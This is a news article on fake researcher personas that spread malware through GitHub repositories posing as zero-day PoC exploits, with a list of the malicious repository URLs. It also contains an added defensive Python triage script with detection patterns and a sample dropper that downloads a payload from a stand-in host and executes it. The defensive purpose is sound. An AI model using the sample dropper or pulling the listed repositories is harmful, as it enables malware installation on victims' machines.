Fake Researcher Profiles Spread Malware through GitHub Repositories as PoC Exploits
14.6.23  Virus  The Hacker News
At least half a dozen GitHub accounts from fake researchers associated with a fraudulent cybersecurity company have been observed pushing malicious repositories on the code hosting service.

All seven repositories, which are still available as of writing, claim to be a proof-of-concept (PoC) exploit for purported zero-day flaws in Discord, Google Chrome, and Microsoft Exchange Server.

VulnCheck, which discovered the activity, said, "the individuals creating these repositories have put significant effort into making them look legitimate by creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called High Sierra Cyber Security."

The cybersecurity firm said it first came across the rogue repositories in early May when they were observed releasing similar PoC exploits for zero-day bugs in Signal and WhatsApp. The two repositories have since been taken down.

Besides sharing some of the purported findings on Twitter in an attempt to build legitimacy, the set of accounts has been found to use headshots of actual security researchers from companies like Rapid7, suggesting that the threat actors have gone to great lengths to execute the campaign.

The PoC is a Python script that's designed to download a malicious binary and execute it on the victim's operating system, be it Windows or Linux.
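As an added example (not code from the article or from VulnCheck), here is a static triage check a defender could run over a downloaded Python "PoC" before executing it: it parses the script with the standard ast module and flags the download-then-execute combination described above, noting an OS branch as a confidence booster. The pattern lists and the sample script are constructed assumptions, not the real repositories' code.

```python
import ast

# Call/attribute patterns that, seen together in a "PoC", match the dropper
# behaviour described above: fetch a binary, branch on OS, run it.
DOWNLOAD_PATTERNS = ("urlopen", "urlretrieve", "requests.get", "wget.download")
EXEC_PATTERNS = ("os.system", "subprocess.Popen", "subprocess.call",
                 "subprocess.run", "os.startfile", "os.execv")
PLATFORM_PATTERNS = ("platform.system", "sys.platform", "os.name")


def _dotted(node):
    """Flatten an attribute chain such as urllib.request.urlopen to a string."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


def _matches(name, patterns):
    return any(name == p or name.endswith("." + p) for p in patterns)


def triage_poc(source):
    """Static triage of a Python PoC: report the suspicious calls it contains."""
    tree = ast.parse(source)
    report = {"download": set(), "execute": set(), "platform_check": False}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if _matches(name, DOWNLOAD_PATTERNS):
                report["download"].add(name)
            elif _matches(name, EXEC_PATTERNS):
                report["execute"].add(name)
        elif isinstance(node, ast.Attribute) and _dotted(node) in PLATFORM_PATTERNS:
            report["platform_check"] = True
    # Download plus execute is the dropper signature; the OS branch raises confidence.
    dropper = bool(report["download"] and report["execute"])
    report["verdict"] = "dropper-like" if dropper else "no dropper pattern"
    return report


# Constructed sample in the shape the article describes (not the real script).
SAMPLE_POC = '''
import os, sys, urllib.request
target = "payload.exe" if sys.platform.startswith("win") else "payload"
urllib.request.urlretrieve("http://example.invalid/" + target, target)
os.system("./" + target)
'''

if __name__ == "__main__":
    print(triage_poc(SAMPLE_POC))
```

A clean result only means none of these patterns were seen; obfuscated or compiled payloads still need manual review in an isolated environment.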
The list of GitHub repositories and fake Twitter accounts is below -

github.com/AKuzmanHSCS/Microsoft-Exchange-RCE
github.com/BAdithyaHSCS/Exchange-0-Day
github.com/DLandonHSCS/Discord-RCE
github.com/GSandersonHSCS/discord-0-day-fix
github.com/MHadzicHSCS/Chrome-0-day
github.com/RShahHSCS/Discord-0-Day-Exploit
github.com/SsankkarHSCS/Chromium-0-Day
twitter.com/AKuzmanHSCS
twitter.com/DLandonHSCS
twitter.com/GSandersonHSCS
twitter.com/MHadzicHSCS
"The attacker has made a lot of effort to create all these fake personas, only to deliver very obvious malware," VulnCheck researcher Jacob Baines said. "It's unclear if they have been successful, but given that they've continued to pursue this avenue of attacks, it seems they believe they will be successful."

It's currently not known if this is the work of an amateur actor or an advanced persistent threat (APT). But security researchers have previously come under the radar of North Korean nation-state groups, as revealed by Google in January 2021.

If anything, the findings show the need for exercising caution when it comes to downloading code from open source repositories. It's also essential that users scrutinize the code prior to execution to ensure it doesn't pose any security risk.